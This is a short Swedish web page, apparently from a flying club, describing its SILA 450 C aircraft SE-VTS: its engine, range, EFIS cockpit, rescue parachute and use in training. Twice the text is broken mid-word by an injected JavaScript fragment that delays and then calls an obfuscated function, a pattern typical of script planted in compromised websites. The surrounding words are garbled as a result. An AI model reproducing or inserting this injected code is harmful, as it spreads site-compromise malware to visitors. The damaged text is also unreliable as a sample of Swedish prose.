SE-VTS: SILA 450 C

SILA 450 C

Tore Sigurd” är vårt nyaste till­skott till flyg­plans­flot­tan, inskaf­fat 2016. Det är ett hög­vingat flyg­plan, byggt helt i lättme­tall och med myc­ket bra och sta­bila fly­ge­gen­ska­per. Flyg­pla­net har en modern och bräns­lesnål 4-taktsmotor på 100 häst­kraf­ter för en topp­fart på över 220 km/h.

C-versionen av SILA 450 är en så kal­lad “Cru­i­ser”, främst avsedd för bekväma lång­di­stans­flyg­ningar, med två styc­ken 45-liters ving­tan­kar för en max­i­mal distans på över 100 mil.

Flyg­pla­net har en rym­lig, ljus och upp­värmd cock­pit med digi­tal instru­ment­pa­nel (så kal­lad EFIS) med inbyggd GPS-baserad navi­ga­tions­ut­rust­ning, två sitt­plat­ser i dub­bel­kommandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando (pilot och pas­sa­ge­rare) och plats för 20 kg bagage. Pla­net är dess­utom utrus­tat med ett kom­plett rädd­nings­sy­stem (en fall­skärm för hela flygplanet).

Utbild­ning av nya ele­ver sker med detta flyg­plan, samt dess ett år äldre tvil­ling, SE-VSL.

Till­ver­kare: Aero-East-Europe
Flyghandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and­bok: SILA 450 C
Tek­niska spe­ci­fi­ka­tio­ner: SILA 450 C
MGL Avio­nics Odys­sey EFIS user manual